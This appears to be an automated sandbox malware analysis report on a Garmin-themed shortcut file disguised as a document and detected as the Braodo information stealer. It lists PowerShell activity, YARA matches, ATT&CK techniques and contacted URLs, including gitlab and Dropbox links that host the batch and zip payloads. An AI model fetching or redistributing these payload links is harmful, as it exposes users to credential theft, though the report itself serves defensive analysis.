Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected Braodo

Source: Yara match	File source: amsi64_6520.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6520, type: MEMORYSTR

Remote Access Functionality

Yara detected Braodo

Source: Yara match	File source: amsi64_6520.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6520, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	1 Command and Scripting Interpreter	11 Scripting	11 Process Injection	111 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	20%	ReversingLabs	Script-BAT.Trojan.Heuristic
3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com/cd/0/get/CgE6CtD6YCSomLayRqankLpMZ4hK	0%	Avira URL Cloud	safe
https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
http://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
edge-block-www-env.dropbox-dns.com	162.125.69.15	true	false	high
gitlab.com	172.65.251.78	true	false	high
www-env.dropbox-dns.com	162.125.65.18	true	false	high
uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	unknown	unknown	false	unknown
www.dropbox.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat	false	high
https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1	false	high
https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://gitlab.com	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/service_worker.js	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/-/sandbox/;	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com/cd/0/get/CgE6CtD6YCSomLayRqankLpMZ4hK	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hellofax.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pal-test.adyen.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.dropbox.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snowplow.trx.gitlab.net	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellosign.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://collector.prd-278964.gl-product-analytics.com	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellosign.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/4p5pc2fbhxx70q	powershell.exe, 0000000F.00000002.2243275004.00000210F3F92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://instructorledlearning.dropboxbusiness.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/page_success/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com	powershell.exe, 00000011.00000002.3322903570.000001C85A713000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C859D22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/pithos/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.sprig.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.docsend.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/encrypted_folder_download/service_worker.js	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/assets/	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navi.dropbox.jp/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.2224731433.00000210DD8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EBF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EC0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C8692A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C86915F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/api/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://edge-block-www-env.dropbox-dns.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropboxstatic.com/static/	powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://officeapps-df.live.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.login.yahoo.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.doc	powershell.exe, 0000000F.00000002.2243734799.00000210F4060000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000F.00000002.2224731433.00000210DBF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C8590F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sentry.gitlab.net	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.yahoo.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docsend.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/playlist/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.recaptcha.net/	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/picker	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.2224731433.00000210DD8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EBF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EC0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C8692A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C86915F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://showcase.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/serviceworker/	powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DCB43000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/f	powershell.exe, 0000000F.00000002.2243795126.00000210F4140000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000F.00000002.2224731433.00000210DCB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C859D22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://new-sentry.gitlab.net	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD571000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/v/s/playlist/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www-env.dropbox-dns.com	powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/document/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/spreadsheets/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canny.io/sdk.js	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/-/sandbox/	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/admin/	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://customers.gitlab.com	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/-/speedscope/index.html	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://selfguidedlearning.dropboxbusiness.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sourcegraph.com	powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	false		high
